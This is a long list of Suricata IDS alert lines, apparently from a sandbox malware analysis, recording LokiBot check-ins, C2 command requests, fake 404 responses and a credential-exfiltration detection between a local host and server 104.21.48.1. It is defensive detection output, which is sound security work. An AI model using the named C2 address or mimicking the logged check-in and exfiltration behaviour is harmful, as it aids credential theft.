Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49762 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49762 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49949 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49949 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49949 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49808 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49731 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49752 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.4:49772
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49769 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49773 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49750 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49750 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.4:49739
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49750 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49738 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49750 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49949 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49949 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49786 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49786 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49761 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49731 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49761 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49731 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49792 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49792 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49761 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49787 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49787 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49787 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49926 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.4:49777
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49761 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49786 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.4:49780
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49808 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49731 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49787 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49787 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.4:49760
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49761 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49759 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49759 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49759 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49839 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49943 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49763 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49763 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49779 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49779 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49779 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49792 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49839 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49909 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49759 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49763 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.4:49752
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.4:49757
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49926 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49786 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49774 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49786 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49774 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49792 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49774 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49785 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49759 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49779 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49785 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49779 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49792 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49763 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49763 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49743 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49743 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49774 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49755 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49755 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49755 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49943 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49839 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49943 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49785 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50004 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50004 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50004 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49798 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49798 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50004 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49798 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50004 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49743 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.4:49746
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49774 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.4:49740
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49743 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49743 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49909 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49785 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49926 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49784 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49785 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49755 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.4:49744
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49839 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49833 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49833 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49833 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49776 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49909 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49776 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49776 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49784 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49798 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.4:49759
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49833 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49909 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.4:49786
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49839 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49784 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49776 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49776 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49784 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49756 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49755 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49897 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49764 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49848 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49848 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49798 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.4:49765
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49848 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49784 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49897 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49897 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49764 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50039 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50039 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50039 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.4:49738
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49943 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49756 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49775 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49756 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49821 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49909 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49821 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49775 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49775 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49897 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50039 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49926 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49756 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49756 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49926 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49782 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49897 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49781 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49782 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49782 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49976 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49976 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49943 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49848 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49781 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49848 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49782 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49782 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.4:49763
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50055 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50055 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49821 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49775 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49775 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50039 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49976 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.4:49798
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.4:49897
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49976 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49976 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49868 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49868 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49781 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49868 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49764 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.4:49774
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49868 -> 104.21.48.1:80
